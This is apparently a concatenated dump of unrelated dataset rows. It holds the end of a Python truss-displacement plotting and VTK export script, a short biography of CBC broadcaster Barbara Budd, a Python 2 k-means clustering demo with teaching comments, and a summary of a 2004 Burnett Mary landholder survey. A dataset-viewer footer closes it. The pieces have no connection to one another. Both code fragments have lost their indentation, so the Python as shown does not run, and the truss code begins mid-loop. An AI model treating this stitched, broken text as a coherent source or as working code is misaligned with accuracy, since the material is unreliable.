yy2 = [zNew[members[i]['start']], zNew[members[i]['end']]]
if(members[i]['stress'] > members[i]['sigma_yield']):
if(members[i]['stress'] < members[i]['sigma_ult']):
plt.plot(xx2, yy2, color="#ffa500")
if(members[i]['stress'] > members[i]['sigma_ult']):
plt.plot(xx2, yy2, color="#ff2500")
else:
plt.plot(xx2, yy2, color="#006600")
plt.xlim([xmin - xRange*factor, xmax + xRange*factor])
plt.ylim([zmin - zRange*factor, zmax + zRange*factor])
plt.xlabel('X Position')
plt.ylabel('Z Position')
plt.title('Truss - XZ View -- Displacements Scaled ' + str(displayScaleFactor) + 'x')
plt.grid(True)
plt.legend()
plt.savefig('Truss_XZ_View.png')
plt.figure()
plt.plot(yOriginal, zOriginal, 'ob', label='Original Position')
plt.hold(True)
plt.plot(yNew, zNew, 'or', label='New Position')
for i in range(nmem):
xx = [yOriginal[members[i]['start']], yOriginal[members[i]['end']]]
yy = [zOriginal[members[i]['start']], zOriginal[members[i]['end']]]
plt.plot(xx, yy, '-b')
xx2 = [yNew[members[i]['start']], yNew[members[i]['end']]]
yy2 = [zNew[members[i]['start']], zNew[members[i]['end']]]
if(members[i]['stress'] > members[i]['sigma_yield']):
if(members[i]['stress'] < members[i]['sigma_ult']):
plt.plot(xx2, yy2, color="#ffa500")
if(members[i]['stress'] > members[i]['sigma_ult']):
plt.plot(xx2, yy2, color="#ff2500")
else:
plt.plot(xx2, yy2, color="#006600")
plt.xlim([ymin - yRange*factor, ymax + yRange*factor])
plt.ylim([zmin - zRange*factor, zmax + zRange*factor])
plt.xlabel('Y Position')
plt.ylabel('Z Position')
plt.title('Truss - YZ View -- Displacements Scaled ' + str(displayScaleFactor) + 'x')
plt.grid(True)
plt.legend()
plt.savefig('Truss_YZ_View.png')
# Write results to VTK files to enable more-flexible visualization via ParaView
# (or any other VTK-supporting viewer)
f = open('TrussOriginal.vtk', 'w')
f.write("# vtk DataFile Version 2.0 \n")
f.write("Truss - Original Configuration \n")
f.write("ASCII \n")
f.write("DATASET UNSTRUCTURED_GRID \n")
f.write("Points " + str(nnodes) + " float \n")
for i in range(nnodes):
f.write(str(nodes[i]['x']) + " " + str(nodes[i]['y']) + " " + str(nodes[i]['z']) + " \n")
f.write("Cells " + str(nmem) + " " + str(nmem*3) + " \n")
for i in range(nmem):
f.write("2 " + str(members[i]['start']) + " " + str(members[i]['end']) + " \n")
f.write("Cell_Types " + str(nmem) + " \n")
for i in range(nmem):
f.write("3 \n") # All "cells" are of type VTK_LINE
f.close()
f = open('TrussNew.vtk', 'w')
f.write("# vtk DataFile Version 2.0 \n")
f.write("Truss - Deformed Configuration - Deformation scaled by " + str(displayScaleFactor) + "x \n")
f.write("ASCII \n")
f.write("DATASET UNSTRUCTURED_GRID \n")
f.write("Points " + str(nnodes) + " float \n")
for i in range(nnodes):
f.write(str(xNew[i]) + " " + str(yNew[i]) + " " + str(zNew[i]) + " \n")
f.write("Cells " + str(nmem) + " " + str(nmem*3) + " \n")
for i in range(nmem):
f.write("2 " + str(members[i]['start']) + " " + str(members[i]['end']) + " \n")
f.write("Cell_Types " + str(nmem) + " \n")
for i in range(nmem):
f.write("3 \n") # All "cells" are of type VTK_LINE
f.close()
|
Barbara Budd is a graduate of York University’s theatre program and began her career on stage including five seasons and 20 productions at Ontario’s Stratford Festival before showing up regularly in radio dramas for the CBC. It was this work that ultimately let to her employment as an on-air presenter for the public broadcaster, spending 17 years as cohost and voice of CBC Radio’s As It Happens. In May 2011, Budd was honoured by ACTRA (Alliance of Canadian Cinema, Television and Radio Artists) with the coveted John Drainie Award. |
import numpy as np
import matplotlib.cm as cm
import KMeans as kmeans
from Point import Point
from Plotter import Plotter
from Centroid import Centroid
def loadData(fileName):
"""
Returns two data sets.
First return value is the x values and the second one is the y values.
"""
data = np.loadtxt(fileName)
data = map(list, zip(* data)) # Magic ;)
return (data[0], data[1])
def getCentroids(clusterPoints):
centroids = []
colors = iter(cm.rainbow(np.linspace(0, 1, len(clusterPoints))))
for index in xrange(0, len(clusterPoints)):
centroids.append(Centroid(clusterPoints[index], next(colors), index))
return centroids
if __name__ == '__main__':
# Init the plotter with some axis parameters
plotter = Plotter([-20, 80], [-20, 80])
# Load data
# TODO Try loading the smallDataSet.txt and see what happens.
# Try not to use the large data sets since the program will be quite slow
# If you want a different dataset talk to @Johan
trainingX, trainingY = loadData('testData.txt')
print "Init - show the data..."
# Just show the data
plotter.plotUnlabledData(trainingX, trainingY)
plotter.show()
raw_input('Press enter to continue')
# Define the centroids based on some points
print "Init - Create the first cluster points and plot them..."
# TODO here is where you change the number of centroids by adding or removing the points.
# The numbers represent the starting points of each centroid with the following coordinate pair: (x, y)
clusterPoints = [Point(2, 3), Point(35, 20), Point(40, 40), Point(60, 60), Point(30, 30)]
centroids = getCentroids(clusterPoints) # just convert the points to centroids for plotting and labeling assistance...
plotter.plotCentroids(centroids)
print "Init complete..."
raw_input('Press enter to continue and to start the algorithm.')
# Run the algorith 10 times
# TODO So right now we are running the algorithm 10 times. Maybe we should come up with some better meassurement?
for x in xrange(1,10):
# Get lables
print "Create the lables, this should take some time...."
# The interesting part is what is going on in the classify method.
labels = kmeans.classify(trainingX, trainingY, centroids)
# Plot the labled data
print "Plot the labled data."
plotter.clear()
plotter.plotCentroids(centroids)
plotter.plotLabledData(trainingX, trainingY, labels, centroids)
raw_input('Press enter to continue')
# Recalculated the centroids and unlable the data so to say...
print "Plot the new centroids."
plotter.clear()
plotter.plotUnlabledData(trainingX, trainingY)
centroids = kmeans.reCalculateCentroids(trainingX, trainingY, labels, centroids)
plotter.plotCentroids(centroids)
raw_input('Press enter to continue')
raw_input("Trying out the clusters with some new data... press enter to continue")
# Here we just look as some different data.
rawDataX, rawDataY = loadData('largeDataSet.txt')
labels = kmeans.classify(rawDataX, rawDataY, centroids)
plotter.clear()
plotter.plotCentroids(centroids)
plotter.plotLabledData(rawDataX, rawDataY, labels, centroids)
raw_input('Finished. Press enter to close.')
|
This report presents a summary of key findings from a mailed survey to 1,000 landholders in the Burnett Mary region in 2004. The final response rate for this survey was 60%. The survey gathered baseline information regarding the key social and economic factors affecting landholder decision-making about the adoption of practices expected to improve the management of natural resources in the Burnett Mary region. Survey findings highlighted that many of the priority issues identified in the draft natural resource management plan for the Burnett Mary region are not considered amongst the most pressing issues facing rural communities. Three of the top five issues identified by landholders related to social issues including the availability of important services, lack of long term opportunities for young people and reduced employment opportunities. While some production and environmental issues such the impact of pest plants and animals and decline in soil health were considered important by many respondents, others such as dryland salinity, soil acidity, decline of native vegetation, deteriorating water quality and lack of awareness about Aboriginal cultural heritage sites were not rated as important issues by most landholders. |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.